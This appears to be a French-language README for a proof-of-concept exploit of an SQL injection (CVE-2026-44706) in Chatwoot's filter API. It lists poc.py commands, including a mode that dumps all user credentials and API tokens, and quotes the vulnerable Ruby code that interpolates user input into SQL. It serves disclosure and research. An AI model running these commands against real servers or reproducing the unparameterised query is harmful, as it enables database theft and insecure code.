
Chatwoot injection SQL dans FilterService
Un exploit de preuve de concept pour CVE-2026-44706, une vulnérabilité d'injection SQL dans FilterService#lt_gt_filter_values de Chatwoot qui permet à tout agent authentifié de lire l'intégralité de la base de données PostgreSQL, y compris les identifiants utilisateur et les jetons API. Lisez l'article complet ici.
Utilisation :
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
Dans app/services/filter_service.rb (ligne 91), l'entrée utilisateur est interpolée directement dans SQL sans paramétrage :
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← entrée utilisateur, sans assainissement
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← interpolation brute
end
Chaque autre opérateur de la classe utilise des paramètres liés (:value_N). Seuls is_greater_than et is_less_than sont vulnérables.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 Injection SQL. Tout agent/administrateur authentifié peut :
pg_sleep() pour épuiser les connexions à la base de données8.8 Élevé CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Cet outil est uniquement destiné à des fins éducatives et de recherche. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce programme.
QuimeraX Intelligence est une plateforme avancée de gestion de la surface d'attaque externe (EASM) et de renseignement sur les cybermenaces, spécialisée dans l'identification des vulnérabilités critiques dans les systèmes complexes. La plateforme surveille, détecte et alerte de manière proactive les clients sur les menaces de sécurité, garantissant la transparence et une réponse rapide aux risques potentiels. Les clients reçoivent des notifications immédiates et des rapports complets si leurs systèmes sont trouvés vulnérables, leur permettant de prendre des mesures de protection. en savoir plus
Hakai Security est une entreprise de cybersécurité fondée par des professionnels de la sécurité, engagée dans l'excellence technique. Nous proposons des solutions de sécurité sur mesure, notamment des tests de pénétration avancés, des simulations réalistes d'équipe rouge et des pratiques de développement sécurisé pour protéger de manière proactive les actifs de nos clients contre les cybermenaces en constante évolution.
Hacking Club est la plateforme de formation où vous apprenez la cybersécurité grâce à des leçons pratiques, des laboratoires et des défis créés par des experts travaillant dans notre cabinet de conseil en sécurité : directement du champ de bataille à votre formation. Pratiquez la vulnérabilité présentée dans ce dépôt par le hacking club ! en savoir plus